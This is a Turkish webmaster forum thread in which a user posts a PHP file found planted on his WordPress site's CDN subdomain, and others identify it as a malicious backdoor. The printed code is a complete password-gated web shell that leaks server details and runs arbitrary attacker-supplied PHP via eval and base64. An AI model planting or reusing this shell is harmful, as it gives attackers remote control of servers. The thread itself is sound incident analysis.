lostyazilim
tr.link

PHP'den iyi anlayan arkadaşlar

6 Mesajlar 1.025 Okunma
acebozum
tr.link

miharbisukarak miharbisukarak Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 27.11.2013
  • Yaş/Cinsiyet 35 / E
  • Meslek İnternet Danışmanı
  • Konum İstanbul Avrupa
  • Ad Soyad H** K**
  • Mesajlar 735
  • Beğeniler 121 / 106
  • Ticaret 6, (%100)
Merhaba, bu kodun ne işe yaradığını bilmeniz mümkün mü acaba?


$_passssword = "asldkjsdfhoiuer3u98iuefghkjdbvmnbkjhas398";

if (!@$_POST["p2"] AND $_POST["pass"]==$_passssword) {

$a = array(

"uname" => php_uname(),

"php_version" => phpversion(),

"safemode" => @ini_get("safe_mode"),

);

echo serialize($a);

exit;

} elseif(!empty($_POST["p2"]) AND $_POST["pass"]==$_passssword) {

eval(base64_decode($_POST["p2"]));

exit;

} elseif(!empty($_POST["p1"]) AND $_POST["pass"]==$_passssword) {

eval($_POST["p1"]);

exit;

}

unset($_passssword);
 

 

elektronikssl
webimgo

delidiwane delidiwane WM Aracı Kullanıcı
  • Üyelik 17.05.2015
  • Yaş/Cinsiyet 44 / E
  • Meslek grafik tasarım
  • Konum İstanbul Anadolu
  • Ad Soyad F** A**
  • Mesajlar 40
  • Beğeniler 1 / 4
  • Ticaret 0, (%0)
eval daima sakattır. adam gibi programlayan kimse eval kullanmaz. genelde sitede sakat olaylar yapmak isteyenler eval kullanır.
zaten yukardaki scriptte php_uname() ile php bilgilerini alıyor php sürümünü alıyor ve safemod bilgisini alıyor. Uzak makineden post ederek bunları elde ediyor.

ÖZET. SİL GİTSİN. KÖTÜ AMAÇLI YAZILIMA BENZİYOR
 

 

Alicevat Alicevat Falanlar, Filanlar... Kullanıcı
  • Üyelik 27.04.2015
  • Yaş/Cinsiyet 40 / E
  • Meslek Yazılım Mühendisi
  • Konum İstanbul Anadolu
  • Ad Soyad A** Y**
  • Mesajlar 457
  • Beğeniler 43 / 202
  • Ticaret 1, (%100)
Selamlar.

Bu şekilde cevap vermek zor. Bu kodun kullanıldığı yer hakkında bilgi verirsen hangi amaçla yazıldığını söyleyebiliriz. Onun haricinde bir çok farklı amaç için kullanılabilir.
 

 

AkıllıSoft Yazılım & Bilişim Teknolojileri

JexyR JexyR Codeigniter / Symfony Kullanıcı
  • Üyelik 27.04.2015
  • Yaş/Cinsiyet 40 / E
  • Meslek Yazılım Müh.
  • Konum Diğer
  • Ad Soyad K** T**
  • Mesajlar 183
  • Beğeniler 11 / 62
  • Ticaret 0, (%0)
eval() : içine gelen bir değeri php olarak yorumlar ve çalıştırır. Bilgisizce kullanıldığında açıktır sadece.

Kod ise : sayfaya form tarafından ya da 3. parti bir yazılım tarafından post eden 'password' verisi ile $_password değişkenindeki değeri kontrol ediyor.

Eğer şifre doğru ise ;
sayfaya dışardan post edilen p2 php kodunu çalıştırır. eğer p2 yok p1 isminde bir form elementi post edilmiş ise p1 ile post edilen değişkeni php olarak çalıştırıyor.

Bu kodları siz eklemediyseniz siliniz aksi takdirde hacklink vs durumlara maruz kalabilirsiniz.
 

 

wmaraci
wmaraci

soulmy soulmy WM Aracı Kullanıcı
  • Üyelik 12.06.2012
  • Yaş/Cinsiyet 38 / E
  • Meslek Öğretmen
  • Konum Samsun
  • Ad Soyad O** Y**
  • Mesajlar 1722
  • Beğeniler 398 / 400
  • Ticaret 20, (%100)
Bu dosyanının bulunduğu adreste istenilen php kodun çalıştırılması mümkün. php'nin yapabildiği birçok şey yapabilir bununla.

Özetle, bu dosya zararlıdır. :)
 

 

.

miharbisukarak miharbisukarak Üyeliği Durdurulmuş Banlı Kullanıcı
  • Üyelik 27.11.2013
  • Yaş/Cinsiyet 35 / E
  • Meslek İnternet Danışmanı
  • Konum İstanbul Avrupa
  • Ad Soyad H** K**
  • Mesajlar 735
  • Beğeniler 121 / 106
  • Ticaret 6, (%100)
Yorumlariniz icin ayri ayri tesekkur ederim arkadaşlar wordpress sitede resimleri yukledigim cdn subdomainindeki bir klasorde gordum iindex.php suphe uyandirdi bende cunku dosyayi ben eklemedim. Masaustune attim ve sunucudan sildim.

Bir kac ay once yuzlerce virus ve spam sildim siteden cok sayida hacklink saldirisi olmus neredeyse hepsini temizledim ama gozden kacanlar olmus demekki.

Hosting firmasina tarama da yaptirdim fakat saniyorum bu tur kodlarin taramada bulunmasi mumkun degil.
 

 

wmaraci
wmaraci
Konuyu toplam 1 kişi okuyor. (0 kullanıcı ve 1 misafir)
Site Ayarları
  • Tema Seçeneği
  • Site Sesleri
  • Bildirimler
  • Özel Mesaj Al